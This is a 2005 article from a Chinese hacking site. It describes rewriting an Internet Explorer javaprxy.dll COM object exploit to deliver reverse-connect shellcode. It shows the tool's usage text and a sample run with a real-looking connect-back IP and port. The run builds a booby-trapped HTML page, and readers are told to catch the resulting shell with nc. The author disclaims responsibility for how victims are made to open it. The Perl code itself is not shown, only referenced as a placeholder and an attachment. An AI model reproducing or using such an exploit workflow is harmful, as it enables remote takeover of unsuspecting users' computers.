|
|
| 首页 | 技术文章 | 软件下载 | 博客 | 论坛 | 精品教程 | 黑客动画 | 视频资源 | 在线服务 | 黑客游戏 | | ||||
|
|
||||||||
|
||||||||
|
|||||
| IE javaprxy.dll COM Object漏洞利用程序改写手记 | |||||
作者:无敌最寂… 文章来源:邪恶八进制 点击数: 更新时间:2005-7-10 ![]() |
|||||
|
Microsoft Internet Explorer javaprxy.dll COM Object 溢出漏洞是前两天刚刚公布的,类似这样的漏洞我在以前也发过一个。这个漏洞的原理我不多说,总之又是IE的一个洞洞。漏洞利用方式依然采用暴力扩大内存的方式,我这里修改主要针对shellcode做了修改。 本地监听的shellcode没什么利用价值,还是反向的来得舒服。但是这个shellcode修改不是那么容易的是,为了防止shellcode被unicode编码所以要采用点小措施来方法。 整个程序我已经写出来了,如下,完全perl代码: Code: [Ctrl+A Select All] 程序的帮助信息如下: H:\temp>doomie.pl Microsoft Internet Explorer javaprxy.dll COM Object Remote Exploit connect back shell rewritten by 无敌最寂寞[EST] Usage: doomie.pl <connect-back-ip> <connect-back-port> [destination file] Attention:if [destination file] is omitted,superlone.html will be default! [-]ERROR! connect back ip must be specified! 参数前两个我就不用多说了吧,最后一个是要生成的文件的文件名,比如dest.html,如果省略默认的文件名是superlone.html。 好,我们来实际生成一个看看: H:\temp>doomie.pl 222.133.151.197 1314 Microsoft Internet Explorer javaprxy.dll COM Object Remote Exploit connect back shell rewritten by 无敌最寂寞[EST] Usage: doomie.pl <connect-back-ip> <connect-back-port> [destination file] Attention:if [destination file] is omitted,superlone.html will be default! [+]Generating Shellcode ......DONE [+]Creating exploitable file ......DONE CHECK if it does WORK! 这样在程序的同目录下生成了一个默认文件名superlone.html的文件。 用ie打开它就会引发溢出,如果你 lucky enough,那就去你的nc检查一下看看是不是得到shell了吧。。 至于怎么让目标机器运行,那是你的事啦,与我无关的说! 以下是我在远程机器上测试后的截图,在此我要感谢论坛的xyzreg兄帮忙测试: ![]() 这是我本机监听的nc的截图: ![]() 附件: doomie.rar |
|||||
| 文章录入:IceRiver 责任编辑:admin | |||||
| 【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 | |||||
| 最新热点 | 最新推荐 | 相关文章 | ||
| 破解Session cookie的方法 浏览器市场IE份额跌至63.9% 不怕被钓鱼 关掉IE 7反钓鱼功 Safari在处理Java Applet的下 轻轻松松铲除恶意网站 实战I 攻陷AJAX 安全专家:Web 2.0站点的coo 黑帽大会研究人员展示如何攻 永远不怕IE主页被修改 IE仍然是过去影响力最高的科 |
网友评论:(只显示最新5条。评论内容只代表网友观点,与本站立场无关!) |
| 关于我们 - 版权声明 - 帮助(?) - 广告服务 - 联系我们 - 友情链接 - 用户注册 - | Powered by ICE RIVER - STUDIO |
| » CnXHacker.CoM | © CopyRight 2002-2006, CnXHacker.CoM™, Inc. All Rights Reserved. |